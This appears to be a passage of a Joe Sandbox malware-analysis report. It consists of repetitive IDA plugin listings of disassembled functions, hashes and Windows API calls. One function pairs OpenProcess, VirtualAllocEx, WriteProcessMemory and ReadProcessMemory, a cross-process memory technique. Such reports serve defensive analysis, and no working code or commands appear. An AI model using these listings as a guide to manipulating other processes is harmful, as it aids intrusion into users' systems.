                                                                                                                        • Instruction ID: d410670a673a972129e9b2a2c068ff01a69ee08d909094a057f6a539cc539986
                                                                                                                        • Opcode Fuzzy Hash: 5014d9703618309798c4595bf12fafa133b3bfc533f8fa828ce004dd7fc20d86
                                                                                                                        • Instruction Fuzzy Hash: 00A11871508305AFD700EF64C891EABB7E9EF99704F40492DF15597292EB70EA09CBB2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$+
                                                                                                                        • API String ID: 0-2552117581
                                                                                                                        • Opcode ID: 5652f9c11e5d37c7dea2133057b05638db8544b720fb32b09bf1ab4bbe26ebfa
                                                                                                                        • Instruction ID: 3844bfda6a8e191e0b669b02eb800c9245b8f54a727e3abe5e3ae9c941a78746
                                                                                                                        • Opcode Fuzzy Hash: 5652f9c11e5d37c7dea2133057b05638db8544b720fb32b09bf1ab4bbe26ebfa
                                                                                                                        • Instruction Fuzzy Hash: 9C510CB5204246CFDF11EF68C885AEA7BB5EF26314F185051F992AB2E0D7349C86CB30
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E2DC40,?,0000000F,0000000C,00000016,00E2DC40,?), ref: 00DD507B
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                          • Part of subcall function 00D9B8A7: _memmove.LIBCMT ref: 00D9B8FB
                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00DD50FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                        • Opcode ID: a0c1eaa7270528966cc602d86e488620b9e255f66eae2039992b82654c743f60
                                                                                                                        • Instruction ID: 148ac7a7797d09260c6506ee1888d1691687d8ef36423a1f998293a782ebdbe2
                                                                                                                        • Opcode Fuzzy Hash: a0c1eaa7270528966cc602d86e488620b9e255f66eae2039992b82654c743f60
                                                                                                                        • Instruction Fuzzy Hash: 7341C274A00609AFCF00DF64D881AAEBBB5FF49304F08816AE856AB356DB30DD41CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DCC9FE,?,?,00000034,00000800,?,00000034), ref: 00DD4D6B
                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DCCFC9
                                                                                                                          • Part of subcall function 00DD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DCCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00DD4D36
                                                                                                                          • Part of subcall function 00DD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00DD4C90
                                                                                                                          • Part of subcall function 00DD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DD4CA0
                                                                                                                          • Part of subcall function 00DD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DD4CB6
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DCD036
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DCD083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                        • Opcode ID: 63f30efab4407e1c6a0f7b5d95e9bf2063bc2e86523d4db3b8b54a3ed1e2535a
                                                                                                                        • Instruction ID: 165e388cb9c5f3605f15fb2e721d47e1b5f2721d2c984f52659ab636f8002fbd
                                                                                                                        • Opcode Fuzzy Hash: 63f30efab4407e1c6a0f7b5d95e9bf2063bc2e86523d4db3b8b54a3ed1e2535a
                                                                                                                        • Instruction Fuzzy Hash: 95413C72900219AFDB10DFA8CC81FDEB779EF49700F148099EA55B7281DA706E45DB71
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E2DBF0,00000000,?,?,?,?), ref: 00DFA4E6
                                                                                                                        • GetWindowLongW.USER32 ref: 00DFA503
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DFA513
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: 9382b5ba52b4ac3160e8890ce510381c0133b9fbb9fb0570adc2735e7c583013
                                                                                                                        • Instruction ID: a3b74d2cc5849125537dd37306eb60af4ba9bb98c0baaf4a2712053e54546098
                                                                                                                        • Opcode Fuzzy Hash: 9382b5ba52b4ac3160e8890ce510381c0133b9fbb9fb0570adc2735e7c583013
                                                                                                                        • Instruction Fuzzy Hash: A631A071200209AFDB218F38DC45BE67B69EF49338F258714F979A32E0C770E8549B60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DFA74F
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DFA75D
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DFA764
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32
                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                        • Opcode ID: 6b798767c1e3fe0aae33bcaaebe1f9a66f3bb47f5db6663e97b699d8d8771b52
                                                                                                                        • Instruction ID: 8299fbe0b92a6db0802b3e2da5557d9b2fa75cda02c27f3d6b361f7cec3ec6e1
                                                                                                                        • Opcode Fuzzy Hash: 6b798767c1e3fe0aae33bcaaebe1f9a66f3bb47f5db6663e97b699d8d8771b52
                                                                                                                        • Instruction Fuzzy Hash: 7C2151B5600209AFDB14EF68DCC1EB737ADEB4A394B094459FA05AB391CB70EC11CA71
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DF983D
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DF984D
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DF9872
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: 043ddc205da01658ac670aff1a3e8804ecd305a3dee494bebede7c441de04610
                                                                                                                        • Instruction ID: 8d40fceaf3398775400656809cca71dae8157207e4b7fba5b9c572d459178a2f
                                                                                                                        • Opcode Fuzzy Hash: 043ddc205da01658ac670aff1a3e8804ecd305a3dee494bebede7c441de04610
                                                                                                                        • Instruction Fuzzy Hash: 2A21C531A1025CBFDB119F54DC95FBB7BAAEF8A7A4F02C124FA04AB190C6719C1187B0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DFA27B
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DFA290
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DFA29D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: 65b2eabec9ee358e7637bc55ec13aeb3dd92c2c3c30fb1618e878809490ecb66
                                                                                                                        • Instruction ID: 841de412c4a06b5a383c49a7c65538ee8a0ff1c17e7a6450c50041fcabe467da
                                                                                                                        • Opcode Fuzzy Hash: 65b2eabec9ee358e7637bc55ec13aeb3dd92c2c3c30fb1618e878809490ecb66
                                                                                                                        • Instruction Fuzzy Hash: 201123B1200308BEEB245F65CC06FA73BA8EF89B54F028118FB49A60D0C672E811CB30
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00DB2F79
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00DB2F80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                        • Opcode ID: c63630b84f60c5b853a6e22075689f093e5a3a8e3964083a6cde868bff39f725
                                                                                                                        • Instruction ID: 756895593064fd7db40dea79e217cb4d6e456811c3e12b30180354cd4baae83d
                                                                                                                        • Opcode Fuzzy Hash: c63630b84f60c5b853a6e22075689f093e5a3a8e3964083a6cde868bff39f725
                                                                                                                        • Instruction Fuzzy Hash: 2AE01A746D9700AEEB145F73ED49BE53669AB05746F144424B102F50A0CBB54048DF15
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DB2F4E), ref: 00DB304E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00DB3055
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                        • Opcode ID: ce18b96da3c273c3a7985963ba6ac226ba3bb870e1b756883bab20d7892b6b2c
                                                                                                                        • Instruction ID: 2b4b85f2160652395323c3b577f341a14279ffcb2bf36d1cb2663927036b2302
                                                                                                                        • Opcode Fuzzy Hash: ce18b96da3c273c3a7985963ba6ac226ba3bb870e1b756883bab20d7892b6b2c
                                                                                                                        • Instruction Fuzzy Hash: 74E0B67468A700EFEB249F73EE0DB853A69BB00722F140824F51AF10B0DBB84548DB16
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                        • Opcode ID: dabc748242b2f3f8c147a7acc99e7f5a21e833639aade334985f35b9daf8ddf9
                                                                                                                        • Instruction ID: adff6a1442ff8d816393a60ab766c4a92d74f5580eaf2cac1be2efab4fb94995
                                                                                                                        • Opcode Fuzzy Hash: dabc748242b2f3f8c147a7acc99e7f5a21e833639aade334985f35b9daf8ddf9
                                                                                                                        • Instruction Fuzzy Hash: B8E01271D0811CFACB14CA919C06DFA73BCBB08340F109492B966F2094D3359B98AB31
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF20EC,?,00DF22E0), ref: 00DF2104
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DF2116
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                        • Opcode ID: d5ae28b88fbe33abc8283d8b3ce3db9376035f79e9c690a9d0ebad117897a385
                                                                                                                        • Instruction ID: 9e2e277099b5b0bb331ffdabfd34af3ffa7c30eb87d4e3452e92eb941bdf34b0
                                                                                                                        • Opcode Fuzzy Hash: d5ae28b88fbe33abc8283d8b3ce3db9376035f79e9c690a9d0ebad117897a385
                                                                                                                        • Instruction Fuzzy Hash: 8ED0A774604312AFD7205F62FC0E66237E8EF04300B05D41DE74AF1154D770C480CA20
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00DAE6D9,?,00DAE55B,00E2DC28,?,?), ref: 00DAE6F1
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00DAE703
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                        • Opcode ID: cde2de302894e9447e96f67effcb2b5706cd972b107e75d68953fa0e91bbd4b2
                                                                                                                        • Instruction ID: 9207f964dfea8d80812af96a5505126c21d08b980cbde045316b4dbb0e985b35
                                                                                                                        • Opcode Fuzzy Hash: cde2de302894e9447e96f67effcb2b5706cd972b107e75d68953fa0e91bbd4b2
                                                                                                                        • Instruction Fuzzy Hash: 76D0A974A04322AFD7242F22FC4C6833BE8BF05300B04A42EF596F2250DBB0C884CA20
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00DAE69C,75570AE0,00DAE5AC,00E2DC28,?,?), ref: 00DAE6B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DAE6C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                        • Opcode ID: 8b5c77fe3a75d903caa7595d9ea1ab41264fbb37789a1b52583a222529ef9d07
                                                                                                                        • Instruction ID: ed714945ff75a00fe78e8f0677a8b095ab47537bf86ee3ad0717530920fb7350
                                                                                                                        • Opcode Fuzzy Hash: 8b5c77fe3a75d903caa7595d9ea1ab41264fbb37789a1b52583a222529ef9d07
                                                                                                                        • Instruction Fuzzy Hash: D3D0A7745443129FD7216F32FC0864237D4AFA8305B08AC1DF546F1160D770C480C620
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00DEEBAF,?,00DEEAAC), ref: 00DEEBC7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DEEBD9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
